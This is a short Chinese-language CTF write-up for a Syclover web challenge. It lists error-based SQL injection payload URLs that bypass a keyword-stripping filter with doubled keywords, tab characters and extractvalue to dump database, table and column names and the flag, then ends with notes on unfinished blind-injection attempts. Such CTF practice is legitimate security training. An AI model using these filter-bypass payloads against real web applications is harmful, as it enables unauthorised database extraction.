Clound的错误2
一样?我要绕过
http://game.sycsec.com:2010
替换为空了 :
or
and
from
空格
where
http://game.sycsec.com:2010/?sycid=%27%09anandd%09(extractvalue(1,concat(0x7e,(selselectect%09group_concat(schema_name)%09frfromom%09infoorrmation_schema.schemata),0x7e)))%23
# 数据库名称 f1ag
http://game.sycsec.com:2010/?sycid=%27%09anandd%09(extractvalue(1,concat(0x7e,(selselectect%09group_concat(table_name)%09frfromom%09infoorrmation_schema.tables%09wwherehere%09table_schema=%27f1ag%27),0x7e)))%23
# 表名 : flag
http://game.sycsec.com:2010/?sycid=%27%09anandd%09(extractvalue(1,concat(0x7e,(selselectect%09group_concat(column_name)%09frfromom%09infoorrmation_schema.columns%09wwherehere%09table_schema=%27f1ag%27),0x7e)))%23
# 列名 : f4ag
http://game.sycsec.com:2010/?sycid=%27%09anandd%09(extractvalue(1,concat(0x7e,(selselectect%09group_concat(f4ag)%09frfromom%09f1ag.flag),0x7e)))%23
# flag : SYC{Err0R_sQl_inj2}
---
比较坑的一点是这个 user 表中好像没有数据 , 所以暂时不能用时间盲注 ???
---
http://game.sycsec.com:2010/?sycid=%27%09anandd%09(extractvalue(1,concat(0x7e,(selselectect%09database()),0x7e)))%23
# 数据库 : user
http://game.sycsec.com:2010/?sycid=%27%09anandd%09(extractvalue(1,concat(0x7e,(selselectect%09group_concat(table_name)%09frfromom%09infoorrmation_schema.tables%09wwherehere%09table_schema=database()),0x7e)))%23
# 表 : user
http://game.sycsec.com:2010/?sycid=%27%09anandd%09(extractvalue(1,concat(0x7e,(selselectect%09group_concat(column_name)%09frfromom%09infoorrmation_schema.columns%09wwherehere%09table_schema=database()),0x7e)))%23
# id,user
关于时间盲注 :
http://game.sycsec.com:2010/?sycid=%27%09uunionnion%09seleselectct%09group_concat(schema_name),1%09frofromm%09infoorrmation_schema.schemata%09uunionnion%09seleselectct%090x10,1%09oorrder%09by%091%23
还没有想出来应该怎么时间盲注... 似乎 sleep 函数被禁用了 ?
benchmark 没有测试 , 不知道可不可以...
网友评论